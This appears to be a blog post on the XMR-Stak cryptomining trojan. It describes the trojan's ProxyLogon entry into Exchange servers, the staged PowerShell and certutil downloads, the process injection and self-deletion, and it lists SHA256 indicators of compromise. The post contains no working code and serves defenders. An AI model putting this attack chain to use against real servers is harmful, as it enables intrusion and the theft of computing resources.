XMR-Stak – Cryptocurrency Miner

Discovered in March 2021, XMR-Stak is a cryptomining trojan that targets vulnerable Microsoft Exchange Server systems with a ProxyLogon exploit. Compromised email systems are used to both mine new currency and as payload hosting servers for new infections.

XMR-Stak is described as been a universal Stratum pool miner. The miner supports CPUs, AMD and NVIDIA GPUs and can be used to mine the crypto currencies Monero, Aeon and many more Cryptonight coins.

Vulnerable Microsoft Exchange servers are initially accessed using a PowerShell command to download a ZIP archive file from a previously compromised server’s Outlook Web Access path. This file is not a legitimate¬†archive but is instead a batch script, which when executed invokes certutil.exe to download and decode two additional spoofed ZIP archives.

The first of these files is another batch script which will decode second file, which contains the miner and it’s configuration data, before injecting it into a running process. If successful, the script then deletes both itself and the other ZIP archives, leaving only the running mining process.

XMR-Stak configuration data states that it will only begin mining if it can create a TLS connection to the attacker’s Monero wallet.

If your unsure what Cryptocurrency is and how it works, then we suggest you read up , there is lots of good books out there for example Cryptocurrency Investing For Dummies or Bitcoin For Dummies, we have found that that “for dummies” range of books offers a great start to any subject area that your unsure about.

Indicators of compromise

SHA256 hashes

  • 3ad9da14e7f7e68e31d6cb6a8cab13e1eb45cb147371edbf0e4ed3e5262b9f51
  • 3dabd3bf16f5856d504d0ae20d3d3c9c6c74ccee562964292bb4565dda91a0e8
  • 4324ba1ca3a4db940dee5de14644e31268df081047b2681b8e33a1f3da7bae9a
  • 54a37cc18dae575965f73cc260cedf5b2d4e356ab53070cc3577c6d0bf125211
  • 6539bbb8cbf33b050d544283f51ccc52ec040b62e3c706d20bd0fe4e221212e3

Duncan Newell

Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.

One thought on “XMR-Stak – Cryptocurrency Miner

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: